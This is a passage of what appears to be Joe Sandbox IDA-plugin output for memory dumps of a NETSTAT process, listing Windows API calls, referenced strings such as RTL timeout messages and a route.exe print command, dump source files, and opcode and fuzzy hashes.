                                                                                                                                                                                  • Instruction Fuzzy Hash: F681AF71E192499FDF28CE68C8517EEBBA5AF5D710F1CC169D851A73D0C77488A0CB60
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  • Opcode ID: 6f8b1749a16742cce6a2c4743433c6401147adbf2d688799e6a875af9c099537
                                                                                                                                                                                  • Instruction ID: f3e7052cb3fedd6617217b549caabdbd1a40965829c86ef82b480811fb6a371e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f8b1749a16742cce6a2c4743433c6401147adbf2d688799e6a875af9c099537
                                                                                                                                                                                  • Instruction Fuzzy Hash: 08216576A10219ABDB11EF79DC40AEEBBF8EF4C640F580526E905E7200E730D9128BA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00642835
                                                                                                                                                                                  • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000105), ref: 00642853
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0064285D
                                                                                                                                                                                  • _wsystem.MSVCRT ref: 00642885
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DirectoryErrorLastSystem_wsystemmemset
                                                                                                                                                                                  • String ID: \route.exe" print
                                                                                                                                                                                  • API String ID: 786266830-1087285068
                                                                                                                                                                                  • Opcode ID: 964946680693131ed91929bcbaaadb80d841bb91addcccb872372c17bf3e10ea
                                                                                                                                                                                  • Instruction ID: 34cc1c1b82c75200566366c77de5616e78ab01f16dace6c2a1456c3dbd81fc4d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 964946680693131ed91929bcbaaadb80d841bb91addcccb872372c17bf3e10ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF018B30A40305EFDB10FB64DD5EB9D777A9F05700F501095B605E7181EB74AA49CB41
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031402BD
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0314031E
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031402E7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: 43c09e6bbbd4737f0c4b3ddf4df66ee262ff818c9d2366df3ecfdd089edc8448
                                                                                                                                                                                  • Instruction ID: 648380d2aef7be1907babf21ec347c9391defd1ee4c1d55d237b63ae244a9cb3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c09e6bbbd4737f0c4b3ddf4df66ee262ff818c9d2366df3ecfdd089edc8448
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91E1AC706097429FD724CF29C884B6AF7E4BB8C714F180A6DF6A58B6E0DB74D845CB42
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 03147B8E
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 03147BAC
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03147B7F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: daf583670034357ce11678dabb77f863c476c58d120509cc78831ef346409ae5
                                                                                                                                                                                  • Instruction ID: 66e0bfb5dd08616519e1ad324b8b126794f31cd307df62878066ff4d5e230402
                                                                                                                                                                                  • Opcode Fuzzy Hash: daf583670034357ce11678dabb77f863c476c58d120509cc78831ef346409ae5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7141E2353057029FC724DE25C840B6AB7E5EF8D710F044A2DF9AA9B6C0DB71E8458B91
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0314728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 031472A3
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03147294
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 031472C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: eb8542c9910a87b1000864bf11793b84c82626528a7dce99c7c38fe1b78c6a19
                                                                                                                                                                                  • Instruction ID: 51a6ed4f055fbe105d8430082e73d87ab7d982807d9e55a42229fd7ddf12ae53
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb8542c9910a87b1000864bf11793b84c82626528a7dce99c7c38fe1b78c6a19
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F41FF35704206ABC720DE65CC41FAAB7A9FF8C710F144A19F866EB280DB61E8528BD1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: d2932465ab31fbbae53b03a17f0a3a7bcf128e5d85d64eeae73ff4547cfddf33
                                                                                                                                                                                  • Instruction ID: d29a8a6508ab65eff9463ee72e9c4beb71ff021336529addd24515c8876b1b6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2932465ab31fbbae53b03a17f0a3a7bcf128e5d85d64eeae73ff4547cfddf33
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3316676A102199FCB21DF29CC50BEEB7F8EF4C610F844595EC49E7240EB309A558FA4
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 006448A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006443B7,0000275D,00000000,00000000,?), ref: 006448CA
                                                                                                                                                                                    • Part of subcall function 006437EC: htons.WS2_32(?), ref: 0064381C
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,00000001,?,?,00000000,0000274F,?), ref: 00643DF9
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000001,?,?,00000000,0000274F,?), ref: 00643E59
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00643E60
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLocal$FormatMessagehtons
                                                                                                                                                                                  • String ID: o$d
                                                                                                                                                                                  • API String ID: 523628632-134025704
                                                                                                                                                                                  • Opcode ID: 9ec2c97b9a221ef95c1146054c7d13221c4c792025f15ef73df02d5e2bae9031
                                                                                                                                                                                  • Instruction ID: 8e716fc3338e61c6c27394955ddc4c37caca1caf9b35ceed97b3095a2276e816
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec2c97b9a221ef95c1146054c7d13221c4c792025f15ef73df02d5e2bae9031
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F81B572D08238AFEB219A64CC8AFEAB77ADB05700F100099F50DB6381DA75AF45DF51
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00645E48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00645E4F
                                                                                                                                                                                  • __set_app_type.MSVCRT ref: 00645962
                                                                                                                                                                                  • __p__fmode.MSVCRT ref: 00645978
                                                                                                                                                                                  • __p__commode.MSVCRT ref: 00645986
                                                                                                                                                                                  • __setusermatherr.MSVCRT ref: 006459A7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1632413811-0
                                                                                                                                                                                  • Opcode ID: eb1a9b06be3ce2e5789e226dbd1a464cf67648a098e1794640c59d46869f4bd5
                                                                                                                                                                                  • Instruction ID: 73ee9a43ef5ac6b75fb9bdaf75e37c8cba0c6da7aa1d7e1c656c2a0054e4efdd
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1a9b06be3ce2e5789e226dbd1a464cf67648a098e1794640c59d46869f4bd5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0AC78508745DFE764AF30EC4A5083B63A707325B506A5EE422873F2DF7595418A15
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
APIs
  • Part of subcall function 00646139: __iob_func.MSVCRT ref: 0064613E
• fprintf.MSVCRT ref: 00644A94
• SnmpUtilMemAlloc.SNMPAPI(00000168,?,00000000,000000FF,00000000,?,00641F9B,?,00000000,000000FF), ref: 00644AE1
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: AllocSnmpUtil__iob_funcfprintf
• String ID: GetTable: type = %d
• API String ID: 2435445832-851864366